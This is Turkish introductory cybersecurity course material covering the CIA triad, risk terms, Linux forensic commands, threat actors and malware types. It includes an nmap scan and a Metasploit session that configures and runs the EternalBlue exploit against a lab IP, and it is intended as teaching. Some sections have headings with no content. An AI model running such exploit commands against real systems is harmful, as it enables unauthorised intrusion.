1.1) Siber Güvenlik Nedir?

1.1.1) Tanım: “Sanat ve Bilim” Olarak Siber Güvenlik

Siber güvenlik, bilgisayar sistemlerini, ağları ve verileri dijital saldırılardan koruma “sanatı ve bilimi” olarak özetlenebilir. Ancak akademik çerçevede daha kapsamlı bir tanım gerekir:

Siber güvenlik, dijital varlıkların gizliliğini, bütünlüğünü ve erişilebilirliğini sağlamak amacıyla uygulanan teknoloji, süreç ve kontroller bütünüdür.

Bu tanımda üç unsur özellikle kritiktir:

• Dijital ortam: Bilgisayarlar, mobil cihazlar, ağlar, internet, bulut servisleri.

• Varlık: Korunması gereken değer (veri/sistem/hizmet).

• Tehdit: Zarar doğurabilecek unsur (kasıtlı saldırı, hata, yanlış yapılandırma, kesinti vb.).

1.1.2) Bilgi Güvenliği ile Siber Güvenlik Arasındaki Fark

Yeni başlayanlar için en kritik ayrım budur:

• Bilgi Güvenliği (Information Security / InfoSec): Bilgiyi fiziksel veya dijital fark etmeksizin korur (kâğıt belge, sözlü bilgi, dijital dosya).

• Siber Güvenlik (Cybersecurity): Bilgi güvenliğinin dijital ortama ve siber uzaya (ağlar, internet, dijital cihazlar, bulut) odaklanan alt kümesidir.

Bu ayrım önemlidir: bir kurumun fiziksel arşiv odasındaki dosyaların kilit altında tutulması bilgi güvenliği kapsamındayken, bu dosyaların dijital taramalarının bir sunucuda saklanması ve ağa açık olması siber güvenlik kapsamını doğrudan ilgilendirir.

Bu ayrım, CIA Üçlüsünü işlerken daha da netleşir; çünkü CIA hedefleri hem bilgi güvenliğinin hem de siber güvenliğin merkezindedir.

1.1.3) Dijital Varlık Kavramı: Veri – Sistem – Hizmet

Bir güvenlik stratejisi kurgulanırken ilk soru şudur: “Neyi koruyoruz?”
Dijital varlıkları üç temel sınıfta ele almak pratik bir çerçeve sağlar:

Veri (Data) — Korunması gereken ham bilgidir. Notlar, sözleşmeler, fotoğraflar, müşteri kayıtları, sınav dokümanları, finansal raporlar ve fikri mülkiyet (örneğin bir yazılımın kaynak kodu) veri kapsamına girer. Verinin ifşası gizliliği, değişmesi bütünlüğü, kaybı ise erişilebilirliği doğrudan etkiler.

Sistem (System) — Veriyi işleyen ve hizmet üreten donanım ile yazılım bileşenleridir. Dizüstü bilgisayar, sunucu, mobil cihaz, veritabanı, işletim sistemi, uygulamalar ve ağ cihazları (yönlendirici, router vb.) sistem kategorisine girer. Sistemler veriyi taşır ve hizmete dönüştürür; sistem bozulduğunda hem veri hem de hizmet etkilenir.

Hizmet (Service) — Kullanıcıların ihtiyaç duyduğu işlevlerin sunulmasıdır. Web sitesinin yayın yapması, e-posta trafiğinin akması, çevrimiçi randevu, ödeme altyapısı ve uzaktan erişim hizmet örnekleridir. Hizmet kesintisi, kullanıcıların ihtiyaç anında erişememesi anlamına gelir; bu da CIA üçlüsünde erişilebilirlik hedefini etkiler.

1.1.4) Dijital Dünyanın Kısa Tarihçesi ve Siber Güvenliğin Doğuşu

Siber güvenlik tarihi, teknolojik ilerleme ile kötüye kullanımın evriminin birlikte ilerlediği bir tarihtir.

• 1970’lerde ARPANET üzerinde dolaşabilen deneysel programlar (ör. Creeper) “ağ üzerinde yayılabilen yazılım” fikrini görünür kılmıştır.

• 1990’larda internetin ticarileşmesiyle bağlantı ve veri akışı hızlanmış; güvenlik, yerel bir teknik mesele olmaktan çıkarak geniş ölçekli bir problem alanına dönüşmüştür.

• Günümüzde siber güvenlik, bireysel merakın ötesinde; kurumsal süreklilik, ulusal güvenlik ve ekonomik istikrarla ilişkili bir öncelik haline gelmiştir.

Bu tarihsel bağlam, bir sonraki modülde tehdit aktörlerinin motivasyonlarını (merak, kazanç, ideoloji, devlet destekli hedefler vb.) anlamak için temel oluşturur.

1.1.5) Günlük Hayattan Örnekler

1.2) Temel Güvenlik Prensipleri — CIA Üçlüsü

CIA Üçlüsü, bilgi güvenliğinin (dolayısıyla siber güvenliğin) en temel modelidir. Bir güvenlik ihlali yaşandığında, bu üç bileşenden en az birinin zarar gördüğü varsayılır.

1.2.1) Gizlilik (Confidentiality)

Gizlilik, bilgiye yalnızca yetkilendirilmiş kişi, süreç veya cihazların erişebilmesi anlamına gelir. Kişisel verilerin veya ticari sırların ifşası mahremiyet kaybına, dolandırıcılığa ve itibar kaybına yol açabileceği için bu ilke kritik öneme sahiptir. Örneğin bir e-ticaret sitesinde kullanıcı parolalarının veritabanında okunabilir şekilde saklanması, sızma halinde gizlilik açısından ağır sonuçlar doğurur. Parola paylaşımı, yanlış paylaşım izinleri ve kamuya açık ağlarda korunmasız oturumlar günlük hayatta gizlilik ihlallerine sıkça rastlanan örneklerdir.

Gizliliği sağlamanın en yaygın yollarından biri şifrelemedir; kriptografik yaklaşımlar modül 5’te daha sistematik ele alınacaktır.

1.2.2) Bütünlük (Integrity)

Bütünlük, verinin doğruluğunun ve tamlığının korunmasını; izinsiz veya hatalı şekilde değiştirilmemesini ifade eder. Yanlış veri, yanlış karar ve yanlış işlem demektir; bu yüzden bütünlük ihlalleri ciddi sonuçlar doğurabilir. Bir banka transferinde gönderilen tutarın alıcıya farklı bir tutar olarak ulaşması net bir bütünlük ihlalidir. Dosyaların kazara bozulması, yanlış sürümün paylaşılması veya izinsiz içerik değişikliği gibi durumlar günlük hayatta bütünlük sorunlarına yol açan yaygın örneklerdir.

Uygulama örneği (bütünlük kontrolü): Yazılım indirme sayfalarında verilen checksum/kontrol toplamı değerleri, indirilen dosyanın yolda bozulmadığını veya değiştirilmediğini doğrulamak için kullanılır.

1.2.3) Erişilebilirlik (Availability)

Erişilebilirlik, yetkili kullanıcıların ihtiyaç duyduğu anda sistemlere ve verilere ulaşabilmesidir. İş sürekliliğini sağlaması açısından kritiktir; veri gizli ve doğru olsa bile hizmet çalışmıyorsa pratikte güvenlik hedefleri karşılanamaz. Bir web sitesinin yoğun trafik saldırısı (DDoS) nedeniyle kullanılamaz hale gelmesi tipik bir erişilebilirlik problemidir. Sistem arızaları, bağlantı kesintileri, yanlış yapılandırmalar ve hizmet kesintileri günlük hayatta erişilebilirlik sorunlarına yol açan yaygın durumlardır.

Kritik örnek: Bir hastanenin randevu sistemi çalışmıyorsa, veri sızmamış ve bozulmamış olsa bile hizmet üretilemediği için erişilebilirlik hedefi zarar görmüştür.

1.2.4) Üçlü Arasında Denge Kurma

Güvenlik tasarımında denge şarttır:

• Çok sıkı gizlilik önlemleri (örn. aşırı karmaşık doğrulama adımları) erişilebilirliği düşürebilir.

• Erişimi aşırı kolaylaştırmak gizlilik riskini artırabilir.

• Değişiklikleri aşırı kısıtlamak süreçleri yavaşlatabilir (bütünlük korunurken iş verimi düşebilir).

1.1’deki “hizmet” varlığı, özellikle erişilebilirlik hedefiyle doğrudan ilişkilidir.
Modül 2’de DoS/DDoS gibi saldırıların daha çok erişilebilirliğe, kimlik avı gibi yöntemlerin ise çoğunlukla gizlilik ve kimlik güvenliğine etki ettiğini örneklerle göreceksiniz.

1.2.5) Günlük Hayattan Örnekler

• Gizlilik: Bir kişi bulut depolama klasörünü yanlışlıkla “herkese açık bağlantı” ile paylaşmıştır; özel belgeler yetkisiz kişilere açılabilir.

• Bütünlük: Ortak bir projede aynı dosya farklı sürümlerde düzenlenir; yanlış sürüm teslim edilir. Veri sızmasa bile bütünlük sorunu oluşur.

• Erişilebilirlik: Yoğun başvuru gününde bir form sayfası açılmaz; veri sızıntısı yoktur ancak hizmet kullanılamaz.

1.3) Temel Siber Güvenlik Kavramları

Bu bölüm, siber güvenlik dilinin “alfabesidir”. Bir olayı analiz ederken şu soruları sistematik hale getirir:

Siber güvenlik dilinin alfabesi.

• Hangi varlık etkilendi?

• Hangi tehdit devredeydi?

• Hangi zafiyet kullanıldı?

• Risk neden yüksekti/düşüktü?

1.3.1) Varlık (Asset)

Korunması gereken değer. Veri, sistem, hizmet; ayrıca zaman, itibar ve iş süreçleri de varlık olarak ele alınabilir. Varlığı tanımlamadan güvenlik hedefi ve öncelik belirlenemez. Örneğin e-posta hesabı bir varlıktır; içindeki mesajlar veri, hesabın çalışması hizmet boyutunu taşır.

1.3.2) Tehdit (Threat)

Bir varlığa zarar verme potansiyeli taşıyan olay, kişi veya koşul. Tehdit her zaman “gerçekleşmiş saldırı” demek değildir. Parola tahmin denemeleri bir tehdittir. Tehdit aktörlerinin kimler olduğu ve motivasyonları Modül 2’de ayrıntılı sınıflandırılacaktır.

1.3.3) Zafiyet (Vulnerability)

Zafiyet, sistem veya süreçte bulunan açıklık ya da eksikliktir. Sadece yazılım hatası değil; yanlış yapılandırma ve süreç zaafları da zafiyet kapsamına girer. Güncellenmemiş uygulama sürümü, aşırı yetkili hesaplar veya varsayılan ayarların değiştirilmemesi günlük hayatta sık görülen zafiyet örnekleridir.

1.3.4) Risk

Risk, bir tehdidin bir zafiyeti kullanma olasılığı ile bunun sonucunda ortaya çıkacak etkinin (zararın) büyüklüğünün birlikte değerlendirilmesidir. Risk yönetimi, sınırlı kaynakları doğru yere ayırabilmek için önceliklendirme sağlar.

Yaygın iki ifade biçimi:

Pedagojik örnek: Bir evin kapısını açık bırakmak zafiyet, sokakta dolaşan bir hırsızın varlığı tehdit, hırsızın o açık kapıdan girip zarar verme olasılığı ve sonucunun büyüklüğü risktir.

1.3.5) Exploit ve Payload

Exploit zafiyeti açar; payload hedefte asıl etkiyi üretir.

• Exploit: Bir zafiyeti istismar etmek için tasarlanmış yöntem/kod/araçtır. “Kapıyı açmak için kullanılan maymuncuk” benzetmesi bu ayrımı sezdirir.

• Payload: Exploit başarılı olduktan sonra hedef sistemde yürütülen asıl zararlı faaliyettir. “İçeri girdikten sonra yapılan eylem” (ör. dosyaları şifreleme, veri çalma, yetki yükseltme) payload ile ilişkilidir.

1.3.6) Zero-Day (Sıfırıncı Gün)

Bilinmeyen zafiyetler savunma için en zorlu durumlardır.

Zero-day, üreticisi tarafından henüz bilinmeyen veya yaması yayımlanmamış güvenlik açıklarıdır. Savunma tarafının hazırlanması için zamanın çok kısıtlı olduğu durumları ifade eder.

1.3.7) Saldırı Zinciri Mantığı (Attack Chain)

Siber saldırılar genellikle tek hamlede olmaz; bir süreç izler. Basit bir saldırı zinciri şu adımlarla kavramsallaştırılabilir:

Bu zincirin “etki” kısmını değerlendirmek için CIA Üçlüsüne geri dönülür.
Bu zincirin her aşamasında alınabilecek temel farkındalık önlemleri Modül 8’de özetlenecektir.

1.3.8) Günlük Hayattan Örnekler

• Risk analizi: Bir kişi aynı parolayı birçok hesapta kullanır (zafiyet). Bir saldırganın daha önce sızmış parola listelerini farklı sitelerde denemesi (tehdit) hesap ele geçirme olasılığını artırır; hesap ele geçirilirse sonuçları ağırsa risk yüksektir.

• Exploit–payload ayrımı: Eski bir uygulamada bir hata vardır (zafiyet). Bu hatayı tetikleyen özel hazırlanmış bir istek (exploit) kullanılır. Sonrasında tarayıcı ayarlarını değiştiren istenmeyen bir yazılımın kurulması payload olabilir.

• Zafiyetin süreç boyutu: Ortak bir hesabın şifresinin herkesle paylaşılması ve kimin ne yaptığına dair iz bırakılmaması süreç zafiyetidir; teknik açık olmasa bile risk üretir.

1.4) Siber Güvenlikte Kullanılan Temel Linux Komutları

Linux, sunucuların büyük çoğunluğunda kullanılan işletim sistemidir. Siber güvenlik uzmanları, olay müdahalesi, log incelemesi ve forensik analizde sıkça Linux terminali ile çalışır. Bu bölümde siber güvenlik pratiğinde en çok kullanılan komutları örnekleriyle tanıyacaksınız.

Linux terminali, siber güvenlik analistlerinin en temel aracıdır.

1.4.1) Oturum ve Konum Komutları

Sunucuya bağlandığınızda ilk olarak kim olduğunuzu ve nerede olduğunuzu bilmeniz gerekir. Aşağıdaki komutlar bu bilgiyi sağlar.

Örnek kullanım:

analyst@sunucu:~$ whoami
analyst

analyst@sunucu:~$ pwd
/root

analyst@sunucu:~$ hostname
prod-db-01

1.4.2) Dizin ve Dosya Komutları

Dosya sisteminde gezinmek ve dosyaları listelemek, forensik incelemede temel adımlardır.

Linux dosya sistemi hiyerarşisi. Loglar genellikle /var/log altındadır.

Örnek — Log dizinine geçiş ve inceleme:

analyst@sunucu:~$ cd /var/log
analyst@sunucu:/var/log$ ls -la
total 1024
drwxr-xr-x  10 root root 4096 Feb 25 02:00 .
drwxr-xr-x  12 root root 4096 Feb 25 01:00 ..
-rw-r-----  1 root adm  2048 Feb 25 02:15 auth.log
-rw-r-----  1 root adm  8192 Feb 25 02:14 syslog
...

analyst@sunucu:/var/log$ tail -n 10 auth.log
Feb 25 02:12:44 sunucu sshd[1234]: Failed password for invalid user admin from 192.168.1.100
Feb 25 02:18:01 sunucu sshd[1235]: Accepted password for analyst from 10.0.0.5

1.4.3) Arama ve Filtreleme Komutları

Log dosyalarında belirli kalıpları aramak, siber güvenlik incelemesinde sık kullanılır.

Örnek — Başarısız SSH girişlerini bulma:

analyst@sunucu:/var/log$ grep "Failed password" auth.log
Feb 25 02:12:40 prod-db-01 sshd[1231]: Failed password for invalid user admin from 192.168.1.100
Feb 25 02:12:44 prod-db-01 sshd[1232]: Failed password for invalid user root from 192.168.1.100

1.4.4) Sistem Bilgisi Komutları

1.4.5) Dosya Çalıştırma ve İzinler

Script veya çalıştırılabilir dosyaları çalıştırmadan önce izinlerin doğru ayarlanması gerekir.

Örnek — Script çalıştırma sırası:

analyst@kali:~$ ls -l scan.sh
-rw-r--r-- 1 analyst analyst 256 Feb 25 10:00 scan.sh

analyst@kali:~$ chmod +x scan.sh
analyst@kali:~$ ./scan.sh
Tarama başlatılıyor...
Port 22 açık
Port 80 açık

1.4.6) Nmap — Ağ Tarama

Nmap, ağ keşfi ve güvenlik taramasında en yaygın kullanılan araçtır. Açık portları, çalışan servisleri ve işletim sistemi bilgisini tespit eder.

Örnek — Hedef sunucu taraması:

analyst@kali:~$ nmap -sV -p 22,80,443 192.168.1.100

Starting Nmap 7.94
Nmap scan report for 192.168.1.100
Host is up.
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu
80/tcp  open  http     nginx 1.18.0
443/tcp open  ssl/http nginx 1.18.0

1.4.7) MSFconsole — Metasploit Framework

Metasploit, zafiyet tarama, exploit geliştirme ve penetrasyon testinde kullanılan güçlü bir framework'tür. msfconsole ile interaktif konsola giriş yapılır.

Örnek — Exploit arama ve kullanım:

msf6 > search eternalblue

Matching Modules
================
#  Name                                      Disclosure Date  Rank
-  ----                                      ---------------  ----
0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       normal

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options

Module options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RHOSTS                     yes       Target address
  RPORT     445              yes       Target port

msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

Nmap ve Metasploit, penetrasyon testlerinde sık kullanılır. Sadece yetkili ortamlarda kullanın.

1.4.8) Ağ ve Veri Komutları

1.4.9) Hash ve Dosya Analizi

Malware analizi ve dosya bütünlüğü kontrolünde kullanılan komutlar.

Örnek — Şüpheli dosya analizi:

analyst@kali:~$ file /tmp/unknown
/tmp/unknown: ELF 64-bit LSB executable

analyst@kali:~$ sha256sum /tmp/unknown
a1b2c3d4e5f6...  /tmp/unknown

analyst@kali:~$ strings /tmp/unknown | grep -i "http\|ip\|pass"
http://192.168.1.100:8080
password=admin123

1.4.10) Proses ve Port Yönetimi

1.4.11) Örnek İnceleme Sırası ve Pratik

Siber güvenlik olay incelemesinde sıklıkla izlenen adımlar:

1. Oturum ve konum: whoami, pwd, hostname ile başlayın.
2. Dizin yapısı: ls -la ile mevcut dizindeki dosyaları (gizliler dahil) listeleyin.
3. Log dizinine geçin: cd /var/log
4. Auth log incelemesi: tail -n 50 auth.log veya grep "Failed" auth.log
5. Şüpheli dizinler: cd /tmp, ls -la ile geçici dosyaları kontrol edin.
6. Dosya türü ve hash: file, sha256sum, strings ile bilinmeyen dosyaları analiz edin.
7. Penetrasyon testi (yetkili ortamda): nmap ile port taraması, msfconsole ile exploit araştırması yapın.

Pratik için: Siber Güvenliğe Giriş simülasyonları sayfasındaki Linux Sunucu Forensik Lab ile bu komutları sırayla uygulayarak gerçek bir inceleme deneyimi kazanabilirsiniz.

Terimler Sözlüğü (Glossary)

Bu Modülde Neler Öğrendik?

• Siber güvenliğin yalnızca teknik bir konu değil; teknoloji, süreç ve kontroller bütünlüğü olduğunu kavradık.

• Bilgi güvenliği ile siber güvenlik arasındaki ilişkiyi doğru konumlandırdık; siber güvenliğin dijital odaklı alt küme olduğunu öğrendik.

• Dijital varlıkları veri–sistem–hizmet olarak sınıflandırarak “neyi koruyoruz?” sorusuna net bir çerçeve kurduk.

• CIA Üçlüsü ile güvenliğin hedeflerini tanımladık ve bu hedefler arasında denge kurmanın zorunlu olduğunu gördük.

• Tehdit, zafiyet ve risk kavramlarını birbirine karıştırmadan ilişkilendirmeyi öğrendik; riskin olasılık ve etkiyle değerlendirildiğini kavradık.

• Exploit ve payload ayrımıyla bir saldırının mekanizması ile etkisini ayırmayı öğrendik; zero-day’in savunma zorluğunu anladık.

• Saldırıların çoğu zaman bir süreç (saldırı zinciri) halinde ilerlediğini ve her aşamanın ayrı önlemler gerektirebileceğini fark ettik.

• Bir sonraki modülde tehdit aktörleri ve saldırı türlerini incelerken bu modüldeki kavramların sürekli referans noktası olacağını gördük.

Modül 2 — Siber Tehdit Aktörleri ve Saldırı Türleri

Modül Amaçları

Bu modülü tamamlayan bir öğrenci:

• Siber tehdit aktörlerini teknik kapasite ve motivasyonlarına göre sınıflandırabilir.

• İç tehditleri (kasıtlı/kazara) ayırt edebilir ve örneklerle anlamlandırabilir.

• Zararlı yazılım (Malware) türlerini (virüs, worm, trojan, ransomware, spyware) karakteristik özelliklerine göre ayırt edebilir.

• Sosyal mühendislik saldırılarının psikolojik temellerini (güven, korku, acele) ve uygulama kanallarını (phishing/vishing/smishing) açıklayabilir.

• Brute force saldırılarının hesap güvenliği üzerindeki etkisini analiz edebilir.

• DoS/DDoS saldırılarının çalışma mantığını kavrayabilir ve hedeflediği CIA bileşenini ilişkilendirebilir.

• Basit olayları aktör–zafiyet–yöntem–etki (CIA) hattında kavramsal olarak çözümleyebilir.

Giriş

Bu modül, siber güvenlikte iki temel soruya giriş seviyesinde sistematik bir yanıt verir: “Tehdit kimden gelir?” ve “Saldırılar nasıl gerçekleşir?”. Önce dijital dünyadaki tehditlerin kaynağı olan tehdit aktörleri (kimlerdir, hangi motivasyonlarla hareket ederler?) sınıflandırılır; ardından başlangıç seviyesinde en yaygın saldırı türleri (zararlı yazılım ailesi, sosyal mühendislik, kaba kuvvet, DoS/DDoS) teknik ve kavramsal düzeyde açıklanır. Modül boyunca Modül 1’de kurulan varlık–tehdit–zafiyet–risk dili somutlaştırılır; bir sonraki modülde (Kimlik ve Hesap Güvenliği) bu saldırıların neden çoğunlukla kullanıcılar ve hesaplar üzerinden başarı kazandığı netleşir.

1) Büyük Resim: “Kim saldırır?” ve “Nasıl saldırır?”

Siber güvenlikte tehditleri anlamak iki temel soruyla başlar:

1. Tehdit aktörü kim?
   Amaç, motivasyon, kaynak (zaman/para), teknik kapasite ve hedef seçimi.

2. Saldırı türü ne?
   Yöntem, kullanılan zafiyet, hedeflenen varlık (veri/sistem/hizmet) ve beklenen etki.

Geri referans (Modül 1): “Tehdit”, bir varlığa zarar verme potansiyelidir; “zafiyet” ise bu zararı mümkün kılan açıklıktır. Bu modül, tehdidi üreten aktörleri ve tehdidin pratikte nasıl saldırıya dönüştüğünü anlatır.
İleri referans (Modül 3): Birçok saldırının en kolay giriş kapısı kullanıcı hesaplarıdır. Parola politikaları, MFA ve dijital kimlik güvenliği bu modülün doğal devamıdır.

2) Tehdit Aktörleri

2.1 Tehdit aktörü nedir?

Tehdit aktörü, siber saldırıyı gerçekleştiren kişi/grup veya saldırıyı tetikleyen iç/dış unsurdur. Aktörleri anlamak önemlidir; çünkü motivasyon ve kaynak (zaman, para, teknik kapasite) saldırının biçimini, hedefini ve etkisini doğrudan belirler.

Aşağıdaki aktör tipleri motivasyonları, neden önemli oldukları ve günlük örnekleriyle birlikte açıklanmaktadır.

2.1.1 Script Kiddies

Script kiddies, başkaları tarafından yazılmış hazır script ve araçları kullanarak saldırı denemeleri yapan, teknik derinliği genellikle sınırlı kişilerdir. Motivasyonları merak, öğrenme isteği ve topluluk içinde görünürlük sağlamaktır. Teknik kapasiteleri düşük olsa da otomatize araçlarla çok sayıda hedefi tarayabilir ve geniş çaplı ama hedefsiz zararlar üretebilirler. Örneğin "en yaygın 50 parola" listesiyle farklı giriş ekranlarında otomatik deneme yapılması veya internetten indirilen hazır bir "site çökertme" aracıyla rastgele bir küçük işletmenin web sayfasına saldıran bir lise öğrencisi tipik örneklerdir. Zayıf parola kullanan hesaplara yönelik denemeler, açık servisleri otomatik tarayan botlar ve rastgele hedef seçimi günlük hayatta sık karşılaşılan durumlardır. Modül 1'deki risk mantığında deneme sayısı yüksek olduğu için olasılık artabilir.

2.1.2 Hacktivistler

Hacktivistler, politik, sosyal veya ideolojik bir mesaj vermek amacıyla siber saldırıları bir araç olarak kullanan kişi ve gruplardır. Motivasyonları farkındalık yaratmak, protesto etmek, bir kurumun itibarını zedelemek ve mesajı görünür kılmaktır. Hedef seçimi çoğu zaman semboliktir; amaç her zaman maddi kazanç değildir. Protesto amacıyla bir web sitesine aşırı istek göndererek kısa süreli erişim sorununa yol açma girişimi veya çevresel bir felakete neden olduğu iddia edilen bir firmanın web sitesini hackleyip ana sayfaya bildiri koyan grup tipik örneklerdir. Duyuru yayınlama, web sitesi görünümünü değiştirme (defacement) ve kampanya dönemlerinde DDoS girişimleri günlük hayatta sık karşılaşılan hacktivist eylemlerdir. Hacktivist eylemler çoğunlukla erişilebilirliği hedef alır; defacement gibi durumlarda bütünlük de etkilenebilir.

2.1.3 Siber Suç Örgütleri

Siber suç örgütleri tamamen profesyonel, organize ve yüksek teknik beceriye sahip gruplardır; çoğu zaman "şirket" gibi rol paylaşımıyla çalışırlar. Motivasyonları finansal kazançtır. Fidye yazılımları (ransomware) ve bankacılık truva atları gibi en yıkıcı saldırıların arkasında sıkça bu gruplar bulunur. Süreçleri "iş modeli" gibi yönetebilirler; kimlik avı ekipleri, zararlı yazılım dağıtım ekipleri ve para aklama ağları gibi bölümlerle çalışırlar. Sahte kargo bildirimi e-postasıyla giriş bilgisi toplayıp ele geçirilen hesaplarla dolandırıcılık yapılması veya veritabanını şifreleyip fidye talep eden organize gruplar tipik örneklerdir. Fidye yazılımı kampanyaları, kimlik bilgisi hırsızlığı, finansal dolandırıcılık ve hesap ele geçirme günlük hayatta sık karşılaşılan siber suç senaryolarıdır.

2.1.4 Devlet Destekli Gruplar ve APT (Gelişmiş Kalıcı Tehdit)

Devlet destekli gruplar ulus devletlerce finanse edilebilen, istihbarat toplama veya stratejik ve kritik altyapılara zarar verme hedefiyle hareket eden en tehlikeli aktörlerdir. Motivasyonları casusluk, stratejik üstünlük ve siber savaştır. Hedef sistemde çok uzun süre fark edilmeden kalabilme (kalıcılık) ve sabırlı, çok aşamalı ilerleme karakteristik özellikleridir. Tek seferlik hızlı saldırı yerine aylar boyunca bir ağda fark edilmeden kalıp veri toplama tipik bir APT yaklaşımıdır. Kritik altyapılar, kamu hizmetleri, savunma sanayi ve büyük ölçekli kurumlar hedef alınır. Bu modülde APT kavram düzeyinde tanıtılmaktadır; "kalıcılık" ve "yanal hareket" gibi kavramlar ağ güvenliği ve olay müdahalesi içeriklerinde daha anlamlı hale gelir.

2.1.5 İç Tehditler (Insider Threats)

İç tehditler, sisteme yasal erişimi olan çalışanlar veya eski personelden kaynaklanan tehditlerdir. İkiye ayrılır: kasıtlı ve kazara oluşan.

Kasıtlı iç tehdit yetkili bir kişinin bilerek zarar vermesi veya bilgiyi kötüye kullanmasıdır. İçeriden gelen kişi çoğu zaman erişim yetkilerine sahiptir; saldırıyı kolaylaştırabilir. Ayrılmadan önce erişebildiği dosyaları izinsiz kopyalayan çalışan veya intikam amacıyla sistemi bozan personel tipik örneklerdir. Yetki kötüye kullanımı, veri sızdırma ve sabotaj günlük hayatta karşılaşılan durumlardır.

Kazara oluşan iç tehdit kötü niyet olmadan hata veya ihmal sonucu güvenlik sorunu doğmasıdır. En yaygın güvenlik kaynaklarından biri insan hatasıdır. Yanlış kişiye hassas dosyayı e-postalamak, yanlış paylaşım izni vermek, güvenlik farkındalığı zayıf olduğu için şifresini başkasına kaptırmak veya yanlışlıkla kritik bir veriyi silmek tipik örneklerdir. Yanlış paylaşım ayarları, kimlik avına kanma, yanlış yapılandırma ve hatalı silme günlük hayatta sık karşılaşılan durumlardır. İç tehditlerde risk sadece teknik zafiyetlerden değil; süreç, eğitim ve yetkilendirme eksiklerinden de doğar.

3) Yaygın Siber Saldırı Türleri (Başlangıç Seviyesi)

Bu bölümde her saldırıyı üç soru üzerinden düşünün:

• Hangi varlık hedefleniyor? (veri / sistem / hizmet)

• CIA’dan hangisi etkileniyor? (Gizlilik / Bütünlük / Erişilebilirlik)

• Hangi zafiyetler sık kullanılıyor? (zayıf parola, yanlış izin, güncellenmemiş sistem, kandırılan kullanıcı vb.)

3.1 Zararlı Yazılım (Malware)

Malware ("Malicious Software"ın kısaltması), sisteme zarar vermek, veri çalmak, kontrol sağlamak veya izinsiz erişim elde etmek için tasarlanmış yazılımların genel adıdır. Gizlilik (veri çalma), bütünlük (veri değiştirme) ve erişilebilirlik (sistemi kilitleme) üzerinde etkili olabilir. Ücretsiz gibi görünen bir program kurulduktan sonra arka planda istenmeyen işlemler yapabilir. Sahte uygulamalar, şüpheli eklentiler, zararlı ekler ve korsan yazılımlar yaygın kaynaklardır. Modül 1'de geçen payload, saldırının hedefte asıl etkiyi üreten kısmıdır; malware çoğu zaman bu rolü üstlenir. Zararlıların işletim sistemi seviyesindeki etkileri Modül 4'te ele alınacaktır.

3.1.1 Virüs (Virus)

Virüs genellikle bir dosyaya veya uygulamaya bulaşır; o dosya çalıştırıldığında etkinleşir ve yayılabilir. Dosya bütünlüğünü bozabilir, veri kaybı ve performans sorunları doğurabilir. Şüpheli bir dosya açıldıktan sonra başka dosyalarda bozulmalar görülmesi tipik bir örnektir. Dosya paylaşımı, taşınabilir bellekler ve e-posta ekleri yaygın bulaşma yollarıdır.

3.1.2 Solucan (Worm)

Solucan, insan müdahalesine gerek duymadan ağ üzerinden bir bilgisayardan diğerine kendi kendine kopyalanabilen zararlı yazılımdır. Hızla yayılıp ağ trafiğini şişirerek hizmetleri aksatabilir. Güncellenmemiş cihazları tarayıp bulduğunda kendini kopyalayan yazılımlar tipik örnektir. Ağ zafiyetlerinden yararlanan otomatik yayılım senaryolarında görülür.

3.1.3 Truva Atı (Trojan)

Truva atı, yararlı veya masum görünen bir program gibi davranıp arka planda zararlı iş yapan yazılımdır; bazı türleri sisteme arka kapı (backdoor) bırakabilir. Kullanıcı güvenini hedefler; kurbanın kurmasına veya çalıştırmasına ihtiyaç duyabilir. "PDF dönüştürücü" gibi görünen bir programın arka planda sisteme kapı açması tipik örnektir. Sahte yazılımlar, crack'li programlar ve sahte güncelleme pencereleri yaygın kaynaklardır.

3.1.4 Fidye Yazılımı (Ransomware)

Fidye yazılımı, kurbanın dosyalarını şifreleyerek veya sistemi kilitleyerek erişimi engeller; erişimi geri vermek için ödeme talep edebilir. Doğrudan erişilebilirliği hedef alır; bazı senaryolarda veri sızdırma tehdidi ile gizlilik boyutu da eklenebilir. Belgeler açılamaz hale gelir ve ekranda "erişimi geri almak için ödeme" mesajı belirir. Zayıf yedekleme, güncellenmemiş sistemler ve kullanıcı hatasıyla çalıştırılan ekler yaygın bulaşma yollarıdır.

3.1.5 Casus Yazılım (Spyware)

Casus yazılım, kullanıcının haberi olmadan bilgi toplayan yazılımlardır. Klavye vuruşlarını kaydeden (keylogger) bileşenler içerebilir; ekranı veya kamerayı gizlice izlemeye yönelik davranışlar sergileyebilir. Öncelikle gizliliği tehdit eder; uzun süre fark edilmeden çalışabilir. Gereksiz izinler isteyen bir uygulamanın arka planda veri göndermesi tipik örnektir. Şüpheli uygulamalar ve istenmeyen tarayıcı eklentileri yaygın kaynaklardır.

3.2 Sosyal Mühendislik Saldırıları

E-posta, SMS ve telefon üzerinden oltalama — insan psikolojisini hedef alan saldırılar.

Sosyal mühendislik, sistemsel açıklardan ziyade insan psikolojisindeki zayıflıkları (güven, korku, acele) kullanan; kişiyi bilgi vermeye, işlem yapmaya veya bir bağlantıya tıklamaya yönlendiren manipülasyon teknikleridir. "İnsan hackleme" olarak da anılır. En iyi teknik altyapı bile kullanıcı kandırılırsa aşılabilir. "Hesabınız kapanacak, hemen doğrulayın" mesajıyla panik yaratılması tipik bir örnektir. E-posta, SMS, telefon aramaları ve sosyal medya mesajları yaygın kanallardır.

3.2.1 Phishing (Oltalama — E-posta ile kimlik avı)

Phishing, e-posta yoluyla güvenilir bir kurum (banka, sosyal medya, destek ekibi) gibi davranarak kullanıcıdan şifre veya kimlik bilgisi istemek veya sahte bir giriş sayfasına yönlendirmektir. "Fatura görüntülemek için giriş yapın" içerikli sahte e-posta ve sahte giriş sayfası veya "Hesabınız askıya alındı, hemen giriş yapın" içerikli sahte e-posta tipik örneklerdir. Hesap ele geçirme, veri sızıntısı ve finansal kayıp doğurabilir.

3.2.2 Vishing (Telefon ile kimlik avı)

Vishing, telefon görüşmesi üzerinden güven kazanıp bilgi almaya çalışmaktır. "Destek ekibiyim, doğrulama kodunu söyleyin" şeklinde aramalar tipik örnektir. Sesli iletişim güveni hızlı oluşturur ve kişiyi anlık karara itebilir.

3.2.3 Smishing (SMS ile kimlik avı)

